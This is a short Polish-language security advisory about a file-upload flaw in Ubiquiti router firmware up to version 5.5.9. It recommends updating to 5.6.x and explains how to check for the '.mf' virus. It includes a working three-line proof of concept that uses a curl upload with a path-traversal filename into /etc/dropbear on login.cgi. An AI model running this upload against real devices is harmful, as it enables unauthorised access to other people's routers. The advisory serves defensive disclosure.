News - Dziurawe Ubiquiti do wersji 5.5.9 ! Zalecana aktualizacja do 5.6.X !
 15-05-2016 01:21:06  Odwiedziny: 1508
Jeśli jesteś szczęśliwym posiadaczem urządzenia ze stajni Ubiquiti to muszę Cie zasmucić. Wersje do 5.5.9 posiadają coś na kształt furtki przez którą można przecisnąć plik i dać dostęp dla nieupoważnionych osób niemających loginu i hasła. Wystarczy, że znany jest port http lub https dzięki któremu logujesz się na swoje urządzenie.
Sprawdź sam:
echo "kazuko" > /tmp/kazuko
curl -F "file=@/tmp/kazuko;filename=../../etc/dropbear/kazuko" -H "Expect:" 'http://1.1.1.1:80/login.cgi' -k
ssh -p 22 ubnt@1.1.1.1 "cat /etc/dropbear/kazuko"
Niestety już ktoś próbuje to wykorzystać i wrzuca wirusy.
Aby sprawdzić czy Twoje urządzenie zostało zawirusowane wykonaj to polecenie z linuxowego terminala:
ssh -p 22 ubnt@1.1.1.1 "ls -a /etc/persistent/ | grep mf"
Lub zaloguj się na urządzenie po ssh (putty) i wykonaj:
ls -a /etc/persistent/ | grep mf
Jeśli Twoim oczom ukarze się coś w stylu:
XW.v5.5.9# ls -a /etc/persistent/ | grep mf
.mf
To znaczy, że urządzenie zostało zakażone.
Jeśli masz więcej urządzeń od Ubiquiti to na pewno zainteresuje Cie skrypt detectMFinUBNT, który sprawdzi te urządzenia czy są zainfekowane.
Jak wyleczyć? sprawdź tu:
https://trzepak.pl/viewtopic.php?f=26&t=51641
http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940
|
